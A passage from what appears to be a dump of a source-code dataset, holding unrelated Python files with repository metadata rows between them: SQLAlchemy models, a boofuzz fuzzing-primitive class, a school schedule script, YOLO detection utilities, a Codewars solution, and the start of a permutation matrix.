user_id = db.Column(db.ForeignKey('users.id', ondelete="CASCADE"))
addresses_id = db.Column(db.ForeignKey('addresses.id', ondelete="CASCADE"))
name = db.Column(db.String(255))
last_name = db.Column(db.String(255))
phone = db.Column(db.String(255))
social_media = db.Column(db.String(255))
created_at = db.Column(db.DateTime(), default=datetime.datetime.utcnow)
updated_at = db.Column(db.DateTime())
class ProfilePicture(db.Model, SerializerMixin):
__tablename__ = 'profiles_images'
id = db.Column(db.Integer, primary_key=True)
profile_id = db.Column(db.ForeignKey('profiles.id', ondelete="CASCADE"))
title = db.Column(db.String(255))
path = db.Column(db.String(255))
created_at = db.Column(db.DateTime(), default=datetime.datetime.utcnow)
updated_at = db.Column(db.DateTime()) | 41.423077 | 79 | 0.724234 | 957 | 0.888579 | 0 | 0 | 0 | 0 | 0 | 0 | 91 | 0.084494 |
d303609067dd385ae7d7e794011ee33a46b6f186 | 861 | py | Python | boofuzz/boofuzz/primitives/simple.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:01.000Z | 2021-06-04T14:27:15.000Z | boofuzz/boofuzz/primitives/simple.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | null | null | null | boofuzz/boofuzz/primitives/simple.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:09.000Z | 2021-06-04T14:27:21.000Z | from ..fuzzable import Fuzzable
class Simple(Fuzzable):
"""Simple bytes value with manually specified fuzz values only.
:type name: str, optional
:param name: Name, for referencing later. Names should always be provided, but if not, a default name will be given,
defaults to None
:type default_value: Raw, optional
:param default_value: Raw static data
:type fuzz_values: list, optional
:param fuzz_values: List of fuzz values, defaults to None. If empty, Simple is equivalent to Static.
:type fuzzable: bool, optional
:param fuzzable: Enable/disable fuzzing of this primitive, defaults to true
"""
def __init__(self, name=None, default_value=None, fuzz_values=None, *args, **kwargs):
super(Simple, self).__init__(name=name, default_value=default_value, fuzz_values=fuzz_values, *args, **kwargs)
| 43.05 | 120 | 0.724739 | 826 | 0.95935 | 0 | 0 | 0 | 0 | 0 | 0 | 588 | 0.682927 |
d303c2dafa1f17c348ddee3c99adecf98990c23e | 12,671 | py | Python | schedule.py | budgidiere/Schedule | 45e2777d9cb24c098a91a4ec83b31127264a1edc | [
"Apache-2.0"
] | null | null | null | schedule.py | budgidiere/Schedule | 45e2777d9cb24c098a91a4ec83b31127264a1edc | [
"Apache-2.0"
] | null | null | null | schedule.py | budgidiere/Schedule | 45e2777d9cb24c098a91a4ec83b31127264a1edc | [
"Apache-2.0"
] | null | null | null | #schedule.py
#importing time
import time
#Making time readable format
clock = (time.ctime())
hour = clock[11:13]
minute = clock[14:16]
currenttime = 60*int(hour) + int(minute)
day = clock[0:3]
print (currenttime)
print (clock)
#IDK why this is here
whatclass = ("none")
#used to read White and Gold week Value
def readwg():
global wg
wgweek = open("wgweekfile.txt","r")
wg = wgweek.read()
wgweek.close()
#Used to wirte white and gold value
def changewg(value):
print("ok")
wgweek_write = open("wgweekfile.txt","w")
wgweek_write.write(str(value))
wgweek_write.close()
changewg = ("false")
#cheking if this is frist run
def checkfirstrun():
if str(wg) == (str(3)):
print ("hi")
changewgvalue = input("Please set white and gold ")
changewg(changewgvalue)
#Used to detirmen class
def getclass():
global whatclass
if str(wg) == (0):
if day == ("Mon"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 508.8 and currenttime > 480:
whatclass = ("4th Period")
elif currenttime < 540 and currenttime > 508.9:
whatclass = ("Advisory")
elif currenttime < 569.4 and currenttime > 540:
whatclass = ("5th Period")
elif currenttime < 611.4 and currenttime > 569.5:
whatclass = ("Activites")
elif currenttime < 666 and currenttime > 611.5:
whatclass = ("6th Period")
elif currenttime < 684 and currenttime > 666.1:
whatclass = ("Lunch")
elif currenttime < 738.6 and currenttime > 684.1:
whatclass = ("7th Peorid")
elif currenttime < 793.2 and currenttime > 738.7:
whatclass = ("1st Peorid")
elif currenttime < 794.6 and currenttime > 793.3:
whatclass = ("Afternoon Break")
elif currenttime < 856.2 and currenttime > 794.7:
whatclass = ("2nd Peorid")
elif currenttime < 912 and currenttime > 856.3:
whatclass = ("3rd Peorid")
elif day == ("Tue"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 547.1 and currenttime > 480.1:
whatclass = ("1st Period")
elif currenttime < 553.2 and currenttime > 547.2:
whatclass = ("Advisory")
elif currenttime < 565.2 and currenttime > 553.3:
whatclass = ("Activities")
elif currenttime < 634.2 and currenttime > 565.3:
whatclass = ("2nd Period")
elif currenttime < 676.1 and currenttime > 634.2:
whatclass = ("Lunch")
elif currenttime < 745.2 and currenttime > 676.2:
whatclass = ("3rd Period")
elif currenttime < 814.2 and currenttime > 745.3:
whatclass = ("4th Period")
elif currenttime < 843.0 and currenttime > 814.3:
whatclass = ("Afternoon Break")
elif currenttime < 912.0 and currenttime > 843.1:
whatclass = ("5th Period")
elif day == ("Wed"):
if currenttime < 540 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 605.4 and currenttime > 540.1:
whatclass = ("6th Period")
elif currenttime < 611.4 and currenttime > 605.5:
whatclass = ("Advisory")
elif currenttime < 667.1 and currenttime > 611.5:
whatclass = ("X Period")
elif currenttime < 682.1 and currenttime > 667.2:
whatclass = ("Lunch")
elif currenttime < 749.4 and currenttime > 682.2:
whatclass = ("7th Period")
elif currenttime < 840.6 and currenttime > 749.5:
whatclass = ("1st Period")
elif currenttime < 845.4 and currenttime > 840.7:
whatclass = ("Afternoon Break")
elif currenttime < 912.0 and currenttime > 845.5:
whatclass = ("2nd Period")
elif day == ("Thu"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Bulding Open")
elif currenttime < 547.1 and currenttime > 480.1:
whatclass = ("3rd Period")
elif currenttime < 553.2 and currenttime > 547.2:
whatclass = ("Advisory")
elif currenttime < 565.2 and currenttime > 553.3:
whatclass = ("Activities")
elif currenttime < 634.2 and currenttime > 565.3:
whatclass = ("4th Period")
elif currenttime < 676.1 and currenttime > 634.2:
whatclass = ("Lunch")
elif currenttime < 745.2 and currenttime > 676.2:
whatclass = ("5th Period")
elif currenttime < 814.2 and currenttime > 745.3:
whatclass = ("6th Period")
elif currenttime < 843.0 and currenttime > 814.3:
whatclass = ("Afternoon Break")
elif currenttime < 912.0 and currenttime > 843.1:
whatclass = ("7th Period")
elif day == ("Fri"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 508.8 and currenttime > 480:
whatclass = ("5th Period")
elif currenttime < 540 and currenttime > 508.9:
whatclass = ("Advisory")
elif currenttime < 569.4 and currenttime > 540:
whatclass = ("6th Period")
elif currenttime < 611.4 and currenttime > 569.5:
whatclass = ("Activites")
elif currenttime < 666 and currenttime > 611.5:
whatclass = ("7th Period")
elif currenttime < 684 and currenttime > 666.1:
whatclass = ("Lunch")
elif currenttime < 738.6 and currenttime > 684.1:
whatclass = ("1st Peorid")
elif currenttime < 793.2 and currenttime > 738.7:
whatclass = ("2nd Peorid")
elif currenttime < 794.6 and currenttime > 793.3:
whatclass = ("Afternoon Break")
elif currenttime < 856.2 and currenttime > 794.7:
whatclass = ("3rd Peorid")
elif currenttime < 912 and currenttime > 856.3:
whatclass = ("4th Peorid")
elif currenttime < 912.1:
changewg(1)
elif str(wg) == (1):
if day == ("Mon"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 508.8 and currenttime > 480:
whatclass = ("4th Period")
elif currenttime < 540 and currenttime > 508.9:
whatclass = ("Advisory")
elif currenttime < 569.4 and currenttime > 540:
whatclass = ("5th Period")
elif currenttime < 611.4 and currenttime > 569.5:
whatclass = ("Activites")
elif currenttime < 666 and currenttime > 611.5:
whatclass = ("6th Period")
elif currenttime < 684 and currenttime > 666.1:
whatclass = ("Lunch")
elif currenttime < 738.6 and currenttime > 684.1:
whatclass = ("7th Peorid")
elif currenttime < 793.2 and currenttime > 738.7:
whatclass = ("1st Peorid")
elif currenttime < 794.6 and currenttime > 793.3:
whatclass = ("Afternoon Break")
elif currenttime < 856.2 and currenttime > 794.7:
whatclass = ("2nd Peorid")
elif currenttime < 912 and currenttime > 856.3:
whatclass = ("3rd Peorid")
elif day == ("Tue"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 547.1 and currenttime > 480.1:
whatclass = ("5th Period")
elif currenttime < 553.2 and currenttime > 547.2:
whatclass = ("Advisory")
elif currenttime < 565.2 and currenttime > 553.3:
whatclass = ("Activities")
elif currenttime < 634.2 and currenttime > 565.3:
whatclass = ("6th Period")
elif currenttime < 676.1 and currenttime > 634.2:
whatclass = ("Lunch")
elif currenttime < 745.2 and currenttime > 676.2:
whatclass = ("7th Period")
elif currenttime < 814.2 and currenttime > 745.3:
whatclass = ("1st Period")
elif currenttime < 843.0 and currenttime > 814.3:
whatclass = ("Afternoon Break")
elif currenttime < 912.0 and currenttime > 843.1:
whatclass = ("2nd Period")
elif day == ("Wed"):
if currenttime < 540 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 605.4 and currenttime > 540.1:
whatclass = ("3rd Period")
elif currenttime < 611.4 and currenttime > 605.5:
whatclass = ("Advisory")
elif currenttime < 667.1 and currenttime > 611.5:
whatclass = ("X Period")
elif currenttime < 682.1 and currenttime > 667.2:
whatclass = ("Lunch")
elif currenttime < 749.4 and currenttime > 682.2:
whatclass = ("4th Period")
elif currenttime < 840.6 and currenttime > 749.5:
whatclass = ("5th Period")
elif currenttime < 845.4 and currenttime > 840.7:
whatclass = ("Afternoon Break")
elif currenttime < 912.0 and currenttime > 845.5:
whatclass = ("6th Period")
elif day == ("Thu"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Bulding Open")
elif currenttime < 547.1 and currenttime > 480.1:
whatclass = ("7th Period")
elif currenttime < 553.2 and currenttime > 547.2:
whatclass = ("Advisory")
elif currenttime < 565.2 and currenttime > 553.3:
whatclass = ("Activities")
elif currenttime < 634.2 and currenttime > 565.3:
whatclass = ("1st Period")
elif currenttime < 676.1 and currenttime > 634.2:
whatclass = ("Lunch")
elif currenttime < 745.2 and currenttime > 676.2:
whatclass = ("2nd Period")
elif currenttime < 814.2 and currenttime > 745.3:
whatclass = ("3rd Period")
elif currenttime < 843.0 and currenttime > 814.3:
whatclass = ("Afternoon Break")
elif currenttime < 912.0 and currenttime > 843.1:
whatclass = ("4th Period")
elif day == ("Fri"):
if currenttime < 480 and currenttime > 420:
whatclass = ("Building Open")
elif currenttime < 508.8 and currenttime > 480:
whatclass = ("2nd Period")
elif currenttime < 540 and currenttime > 508.9:
whatclass = ("Advisory")
elif currenttime < 569.4 and currenttime > 540:
whatclass = ("3rd Period")
elif currenttime < 611.4 and currenttime > 569.5:
whatclass = ("Activites")
elif currenttime < 666 and currenttime > 611.5:
whatclass = ("4th Period")
elif currenttime < 684 and currenttime > 666.1:
whatclass = ("Lunch")
elif currenttime < 738.6 and currenttime > 684.1:
whatclass = ("5th Peorid")
elif currenttime < 793.2 and currenttime > 738.7:
whatclass = ("6th Peorid")
elif currenttime < 794.6 and currenttime > 793.3:
whatclass = ("Afternoon Break")
elif currenttime < 856.2 and currenttime > 794.7:
whatclass = ("7th Peorid")
elif currenttime < 912 and currenttime > 856.3:
whatclass = ("1st Peorid")
elif currenttime < 912.1:
changewg(0)
else:
whatclass = ("none")
#Main part of the program
while True:
#read wg value
readwg()
#cheks if it's first run
checkfirstrun()
#get what class it is
getclass()
#prints the class (will be replaced)
print(whatclass)
#sleeps so no spam
time.sleep(60)
| 45.253571 | 61 | 0.531529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,756 | 0.138584 |
d306731d5628f849cd0f722161fc760de645252f | 77 | py | Python | duffy/models/__init__.py | Zlopez/duffy | db9621a2f2127b41d3ed6e29d8e50bf0f0d68a64 | [
"Apache-2.0"
] | null | null | null | duffy/models/__init__.py | Zlopez/duffy | db9621a2f2127b41d3ed6e29d8e50bf0f0d68a64 | [
"Apache-2.0"
] | null | null | null | duffy/models/__init__.py | Zlopez/duffy | db9621a2f2127b41d3ed6e29d8e50bf0f0d68a64 | [
"Apache-2.0"
] | null | null | null | from .nodes import Host, HostSchema, Session, SessionSchema, Project, SSHKey
| 38.5 | 76 | 0.805195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d3069280ed59ec70e2f911b0845f83eda4671be0 | 973 | py | Python | math/next_perfect_square.py | ethyl2/code_challenges | 3c9ccca1782f92728e60a515a7ca797f6d470e81 | [
"MIT"
] | null | null | null | math/next_perfect_square.py | ethyl2/code_challenges | 3c9ccca1782f92728e60a515a7ca797f6d470e81 | [
"MIT"
] | null | null | null | math/next_perfect_square.py | ethyl2/code_challenges | 3c9ccca1782f92728e60a515a7ca797f6d470e81 | [
"MIT"
] | null | null | null | """
https://www.codewars.com/kata/56269eb78ad2e4ced1000013/train/python
Given an int, return the next 'integral perfect square', which is an integer n such that sqrt(n) is also an int.
If the given int is not an integral perfect square, return -1.
"""
def find_next_square(sq: int) -> int:
sqrt_of_sq = sq ** (1/2)
if sqrt_of_sq % 1 != 0:
return -1
else:
return int((sqrt_of_sq + 1) ** 2)
def find_next_square2(sq: int) -> int:
"""
This version is just more compact.
"""
sqrt_of_sq = sq ** (1/2)
return -1 if sqrt_of_sq % 1 != 0 else int((sqrt_of_sq + 1) ** 2)
def find_next_square3(sq: int) -> int:
"""
This version uses the .is_integer() method instead of %.
"""
sqrt_of_sq = sq ** 0.5
return int((sqrt_of_sq+1)**2) if sqrt_of_sq.is_integer() else -1
print(find_next_square3(4)) # 9
print(find_next_square3(121)) # 144
print(find_next_square3(625)) # 676
print(find_next_square3(114)) # -1
| 26.297297 | 112 | 0.644399 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 391 | 0.40185 |
d30a1906d50b139c0bbc67c894830907d3ce4a76 | 483 | py | Python | scripts/moveCenterPtOutOfExtras.py | 75RAUL/georef | f21658bb5d765f04dce10c9e5b9a8942a76011c2 | [
"NASA-1.3",
"Apache-2.0"
] | 6 | 2017-07-13T21:09:24.000Z | 2021-12-09T16:52:01.000Z | scripts/moveCenterPtOutOfExtras.py | 75RAUL/georef | f21658bb5d765f04dce10c9e5b9a8942a76011c2 | [
"NASA-1.3",
"Apache-2.0"
] | 1 | 2021-06-01T20:08:03.000Z | 2021-06-01T20:08:03.000Z | scripts/moveCenterPtOutOfExtras.py | 75RAUL/georef | f21658bb5d765f04dce10c9e5b9a8942a76011c2 | [
"NASA-1.3",
"Apache-2.0"
] | 16 | 2017-07-16T03:02:38.000Z | 2022-02-26T19:30:00.000Z | #! /usr/bin/env python
import django
from django.conf import settings
django.setup()
from geocamTiePoint.models import Overlay
def moveCenterPtOutOfExtras():
overlays = Overlay.objects.all()
for overlay in overlays:
overlay.centerLat = overlay.extras.centerLat
overlay.centerLon = overlay.extras.centerLon
overlay.nadirLat = overlay.extras.nadirLat
overlay.nadirLon = overlay.extras.nadirLon
overlay.save()
moveCenterPtOutOfExtras() | 28.411765 | 52 | 0.73706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 22 | 0.045549 |
d30a5c4ca313464e5235db512ad065b7b5f40078 | 11,087 | py | Python | xl_tensorflow/models/vision/detection/utils/yolo_utils.py | Lannister-Xiaolin/xl_tensorflow | 99e0f458769ee1e45ebf55c789961e40f7d2eeac | [
"Apache-2.0"
] | null | null | null | xl_tensorflow/models/vision/detection/utils/yolo_utils.py | Lannister-Xiaolin/xl_tensorflow | 99e0f458769ee1e45ebf55c789961e40f7d2eeac | [
"Apache-2.0"
] | 1 | 2020-11-13T18:52:23.000Z | 2020-11-13T18:52:23.000Z | xl_tensorflow/models/vision/detection/utils/yolo_utils.py | Lannister-Xiaolin/xl_tensorflow | 99e0f458769ee1e45ebf55c789961e40f7d2eeac | [
"Apache-2.0"
] | null | null | null | #!usr/bin/env python3
# -*- coding: UTF-8 -*-
from functools import reduce
from PIL import Image, ImageFont, ImageDraw
import numpy as np
from matplotlib.colors import rgb_to_hsv, hsv_to_rgb
import colorsys
def compose(*funcs):
"""Compose arbitrarily many functions, evaluated left to right.
Reference: https://mathieularose.com/function-composition-in-python/
"""
# return lambda x: reduce(lambda v, f: f(v), funcs, x)
if funcs:
return reduce(lambda f, g: lambda *a, **kw: g(f(*a, **kw)), funcs)
else:
raise ValueError('Composition of empty sequence not supported.')
def letterbox_image(image, size, fill=128):
'''
不改变长宽比
resize image with unchanged aspect ratio using padding
'''
iw, ih = image.size
w, h = size
scale = min(w / iw, h / ih)
nw = int(iw * scale)
nh = int(ih * scale)
image = image.resize((nw, nh), Image.BICUBIC)
new_image = Image.new('RGB', size, (fill, fill, fill))
new_image.paste(image, ((w - nw) // 2, (h - nh) // 2))
return new_image
def rand(a=0, b=1):
return np.random.rand() * (b - a) + a
def get_random_data(annotation_line, input_shape, random=True,
max_boxes=20, jitter=.3, hue=.1, sat=1.5, val=1.5, proc_img=True):
'''
random preprocessing for real-time data augmentation
1、所有图片都会resize到小于416以下,不足416则粘贴到背景为128的图片中,并归一化(/255)
2、
'''
line = annotation_line.split()
image = Image.open(line[0])
iw, ih = image.size
h, w = input_shape
box = np.array([np.array(list(map(int, box.split(',')))) for box in line[1:]])
if not random:
# resize image
scale = min(w / iw, h / ih)
nw = int(iw * scale)
nh = int(ih * scale)
dx = (w - nw) // 2
dy = (h - nh) // 2
image_data = 0
if proc_img:
image = image.resize((nw, nh), Image.BICUBIC)
new_image = Image.new('RGB', (w, h), (128, 128, 128))
new_image.paste(image, (dx, dy))
image_data = np.array(new_image) / 255.
# correct boxes
box_data = np.zeros((max_boxes, 5))
if len(box) > 0:
np.random.shuffle(box)
if len(box) > max_boxes: box = box[:max_boxes]
box[:, [0, 2]] = box[:, [0, 2]] * scale + dx
box[:, [1, 3]] = box[:, [1, 3]] * scale + dy
box_data[:len(box)] = box
return image_data, box_data
# resize image
new_ar = w / h * rand(1 - jitter, 1 + jitter) / rand(1 - jitter, 1 + jitter)
scale = rand(.25, 2)
if new_ar < 1:
nh = int(scale * h)
nw = int(nh * new_ar)
else:
nw = int(scale * w)
nh = int(nw / new_ar)
image = image.resize((nw, nh), Image.BICUBIC)
# place image
dx = int(rand(0, w - nw))
dy = int(rand(0, h - nh))
new_image = Image.new('RGB', (w, h), (128, 128, 128))
new_image.paste(image, (dx, dy))
image = new_image
# flip image or not
flip = rand() < .5
if flip: image = image.transpose(Image.FLIP_LEFT_RIGHT)
# distort image
hue = rand(-hue, hue)
sat = rand(1, sat) if rand() < .5 else 1 / rand(1, sat)
val = rand(1, val) if rand() < .5 else 1 / rand(1, val)
x = rgb_to_hsv(np.array(image) / 255.)
x[..., 0] += hue
x[..., 0][x[..., 0] > 1] -= 1
x[..., 0][x[..., 0] < 0] += 1
x[..., 1] *= sat
x[..., 2] *= val
x[x > 1] = 1
x[x < 0] = 0
image_data = hsv_to_rgb(x) # numpy array, 0 to 1
# correct boxes
box_data = np.zeros((max_boxes, 5))
if len(box) > 0:
np.random.shuffle(box)
box[:, [0, 2]] = box[:, [0, 2]] * nw / iw + dx
box[:, [1, 3]] = box[:, [1, 3]] * nh / ih + dy
if flip: box[:, [0, 2]] = w - box[:, [2, 0]]
box[:, 0:2][box[:, 0:2] < 0] = 0
box[:, 2][box[:, 2] > w] = w
box[:, 3][box[:, 3] > h] = h
box_w = box[:, 2] - box[:, 0]
box_h = box[:, 3] - box[:, 1]
box = box[np.logical_and(box_w > 1, box_h > 1)] # discard invalid box
if len(box) > max_boxes: box = box[:max_boxes]
box_data[:len(box)] = box
return image_data, box_data
def draw_image(image, out_boxes, out_scores, out_classes, class_names):
"""绘制标注框"""
font = ImageFont.truetype(font='font/FiraMono-Medium.otf',
size=np.floor(3e-2 * image.size[1] + 0.5).astype('int32'))
thickness = (image.size[0] + image.size[1]) // 300
hsv_tuples = [(x / len(class_names), 1., 1.) for x in range(len(class_names))]
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
for i, c in reversed(list(enumerate(out_classes))):
predicted_class = class_names[c]
box = out_boxes[i]
score = out_scores[i]
label = '{} {:.2f}'.format(predicted_class, score)
draw = ImageDraw.Draw(image)
label_size = draw.textsize(label, font)
top, left, bottom, right = box
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))
right = min(image.size[0], np.floor(right + 0.5).astype('int32'))
print(label, (left, top), (right, bottom))
if top - label_size[1] >= 0:
text_origin = np.array([left, top - label_size[1]])
else:
text_origin = np.array([left, top + 1])
# My kingdom for a good redistributable image drawing library.
for i in range(thickness):
draw.rectangle(
[left + i, top + i, right - i, bottom - i],
outline=colors[c])
draw.rectangle(
[tuple(text_origin), tuple(text_origin + label_size)],
fill=colors[c])
draw.text(text_origin, label, fill=(0, 0, 0), font=font)
del draw
return image
def get_classes(classes_path):
'''loads the classes'''
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def get_anchors(anchors_path):
'''loads the anchors from a file'''
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def preprocess_true_boxes(true_boxes, input_shape, anchors, num_classes):
'''
Preprocess true boxes to training input format
所有box会定位到指定的grid
Args:
true_boxes: array, shape=(m, T, 5),绝对值
Absolute x_min, y_min, x_max, y_max, class_id relative to input_shape.
input_shape: array-like, hw, multiples of 32
anchors: array, shape=(N, 2), 2 refer to wh, N refer to number of achors
num_classes: integer
Returns
y_true:
list of array, shape like yolo_outputs, xywh are reletive value
即相对值,相对整图比例, y_true 形状通常为 [array(1,26,26,3,85),]
一个box只会对应一个尺度的一个grid, 尺度的选择根据与anchor box的iou来定
首先计算box与9个anchor的iou,计算最高iou的anchorbox,选择该anchor box作为负责预测的anchor
,根据anchor索引和坐标定位到相应的grid
'''
assert (true_boxes[..., 4] < num_classes).all(), 'class id must be less than num_classes'
num_layers = len(anchors) // 3 # default setting
anchor_mask = [[6, 7, 8], [3, 4, 5], [0, 1, 2]] if num_layers == 3 else [[3, 4, 5], [1, 2, 3]]
true_boxes = np.array(true_boxes, dtype='float32')
input_shape = np.array(input_shape, dtype='int32')
boxes_xy = (true_boxes[..., 0:2] + true_boxes[..., 2:4]) // 2
boxes_wh = true_boxes[..., 2:4] - true_boxes[..., 0:2]
true_boxes[..., 0:2] = boxes_xy / input_shape[::-1]
true_boxes[..., 2:4] = boxes_wh / input_shape[::-1]
m = true_boxes.shape[0]
grid_shapes = [input_shape // {0: 32, 1: 16, 2: 8}[l] for l in range(num_layers)]
y_true = [np.zeros((m, grid_shapes[l][0], grid_shapes[l][1], len(anchor_mask[l]), 5 + num_classes),
dtype='float32') for l in range(num_layers)]
# Expand dim to apply broadcasting.
anchors = np.expand_dims(anchors, 0)
anchor_maxes = anchors / 2.
anchor_mins = -anchor_maxes
valid_mask = boxes_wh[..., 0] > 0
for b in range(m):
# Discard zero rows.
wh = boxes_wh[b, valid_mask[b]]
if len(wh) == 0: continue
# Expand dim to apply broadcasting.
wh = np.expand_dims(wh, -2)
box_maxes = wh / 2.
box_mins = -box_maxes
# 所有box都会与anchor进行对比,
intersect_mins = np.maximum(box_mins, anchor_mins)
intersect_maxes = np.minimum(box_maxes, anchor_maxes)
intersect_wh = np.maximum(intersect_maxes - intersect_mins, 0.)
intersect_area = intersect_wh[..., 0] * intersect_wh[..., 1]
box_area = wh[..., 0] * wh[..., 1]
anchor_area = anchors[..., 0] * anchors[..., 1]
iou = intersect_area / (box_area + anchor_area - intersect_area)
# Find best anchor for each true box,此处已经确定对应最好的anchorbox了
best_anchor = np.argmax(iou, axis=-1)
for t, n in enumerate(best_anchor):
for l in range(num_layers):
# 一个box只会对应一个尺度一个grid, 尺度的选择根据与anchor box的iou来定
if n in anchor_mask[l]:
i = np.floor(true_boxes[b, t, 0] * grid_shapes[l][1]).astype('int32')
j = np.floor(true_boxes[b, t, 1] * grid_shapes[l][0]).astype('int32')
# 单个grid最多允许三个box,多余的会被覆盖,根据anchor确定位置
# 即如果两个框对应同一个anchor,且位置相近的话,有一个会被覆盖
k = anchor_mask[l].index(n)
c = true_boxes[b, t, 4].astype('int32')
y_true[l][b, j, i, k, 0:4] = true_boxes[b, t, 0:4]
# real object confidence
y_true[l][b, j, i, k, 4] = 1
y_true[l][b, j, i, k, 5 + c] = 1
return y_true
def data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes, seperate_y=True):
'''data generator for fit_generator'''
n = len(annotation_lines)
i = 0
while True:
image_data = []
box_data = []
for b in range(batch_size):
if i == 0:
np.random.shuffle(annotation_lines)
image, box = get_random_data(annotation_lines[i], input_shape, random=True)
image_data.append(image)
box_data.append(box)
i = (i + 1) % n
image_data = np.array(image_data)
box_data = np.array(box_data)
y_true = preprocess_true_boxes(box_data, input_shape, anchors, num_classes)
if seperate_y:
yield image_data, y_true
else:
yield (image_data, *y_true), np.zeros(batch_size)
def data_generator_wrapper(annotation_lines, batch_size, input_shape, anchors, num_classes, seperate_y=True):
annotation_lines = [i for i in annotation_lines if i.strip()]
n = len(annotation_lines)
if n == 0 or batch_size <= 0: return None
return data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes, seperate_y)
| 36.711921 | 109 | 0.570759 | 0 | 0 | 843 | 0.072993 | 0 | 0 | 0 | 0 | 2,529 | 0.21898 |
d30abca75b19bde3ab81fb5f1a0732de35ef0670 | 416 | py | Python | src/python/shared/constants.py | rgrannell1/monic-polynomial | dec350112ec28a065e7be70151da20b203cde35b | [
"Unlicense"
] | null | null | null | src/python/shared/constants.py | rgrannell1/monic-polynomial | dec350112ec28a065e7be70151da20b203cde35b | [
"Unlicense"
] | 10 | 2016-05-29T22:48:29.000Z | 2021-09-14T10:38:06.000Z | src/python/shared/constants.py | rgrannell1/polynomial | dec350112ec28a065e7be70151da20b203cde35b | [
"Unlicense"
] | null | null | null |
import os
constants = {
'print_frequency': 10_000,
'flush_threshold': 10_000,
'tile_size': 5_000,
'project_root': os.path.realpath(os.path.join(os.path.dirname(__file__), '../../../')),
'colours': {
'background': 'black'
},
'escapes': {
'line_up': '\x1b[A',
'line_delete': '\x1b[K'
},
'units': {
'bytes_per_gibibyte': 2 ** 30
},
'batch_size': 200_000,
'paths': {
'db': './db.sqlite'
}
}
| 17.333333 | 88 | 0.584135 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 208 | 0.5 |
d30ac629c524ea866310dba919699e150da5f2f1 | 7,143 | py | Python | server/permatrix.py | osaizar/sand | b98c954090af69410589360a68e68cd10d52f782 | [
"Apache-2.0"
] | null | null | null | server/permatrix.py | osaizar/sand | b98c954090af69410589360a68e68cd10d52f782 | [
"Apache-2.0"
] | null | null | null | server/permatrix.py | osaizar/sand | b98c954090af69410589360a68e68cd10d52f782 | [
"Apache-2.0"
] | null | null | null | import random
import numpy as np
MATRIX = [(7, 6, 2, 1, 0, 3, 5, 4),
(6, 5, 0, 1, 3, 2, 4, 7),
(1, 0, 3, 7, 5, 4, 6, 2),
(7, 5, 2, 6, 1, 3, 0, 4),
(0, 4, 2, 3, 7, 1, 6, 5),
(7, 1, 0, 2, 3, 5, 6, 4),
(3, 4, 2, 6, 0, 7, 5, 1),
(6, 1, 5, 2, 7, 4, 0, 3),
(3, 1, 4, 5, 0, 7, 2, 6),
(3, 2, 6, 5, 0, 4, 1, 7),
(3, 0, 6, 1, 7, 5, 4, 2),
(0, 6, 1, 7, 4, 2, 5, 3),
(3, 5, 2, 0, 7, 4, 6, 1),
(5, 4, 0, 3, 1, 7, 2, 6),
(4, 1, 6, 3, 2, 7, 0, 5),
(3, 7, 5, 1, 2, 0, 6, 4),
(4, 5, 2, 7, 6, 0, 3, 1),
(7, 2, 4, 6, 0, 3, 1, 5),
(3, 7, 5, 6, 1, 0, 4, 2),
(0, 5, 4, 3, 7, 2, 1, 6),
(4, 0, 2, 3, 1, 6, 5, 7),
(1, 7, 6, 3, 4, 0, 2, 5),
(5, 7, 3, 2, 6, 1, 4, 0),
(1, 3, 0, 5, 2, 7, 4, 6),
(7, 4, 3, 5, 1, 6, 0, 2),
(5, 1, 3, 0, 4, 2, 6, 7),
(7, 0, 2, 3, 1, 5, 6, 4),
(4, 0, 7, 6, 1, 5, 3, 2),
(5, 3, 6, 1, 4, 7, 2, 0),
(2, 4, 5, 1, 7, 0, 6, 3),
(1, 2, 4, 3, 6, 5, 0, 7),
(4, 7, 6, 5, 0, 2, 3, 1),
(4, 5, 3, 0, 6, 2, 7, 1),
(5, 7, 6, 3, 2, 1, 0, 4),
(5, 6, 7, 0, 4, 2, 1, 3),
(0, 7, 2, 6, 5, 4, 3, 1),
(6, 0, 5, 1, 3, 4, 2, 7),
(7, 1, 5, 2, 3, 4, 6, 0),
(2, 5, 4, 7, 0, 1, 3, 6),
(4, 5, 0, 6, 1, 2, 3, 7),
(3, 2, 0, 6, 7, 4, 5, 1),
(2, 6, 3, 1, 5, 0, 4, 7),
(7, 4, 2, 1, 6, 3, 5, 0),
(5, 3, 2, 6, 1, 0, 4, 7),
(6, 5, 4, 0, 3, 7, 2, 1),
(6, 2, 7, 3, 5, 1, 4, 0),
(3, 4, 2, 7, 6, 0, 1, 5),
(1, 6, 0, 3, 7, 2, 4, 5),
(2, 7, 4, 1, 5, 3, 0, 6),
(3, 1, 0, 5, 4, 2, 6, 7),
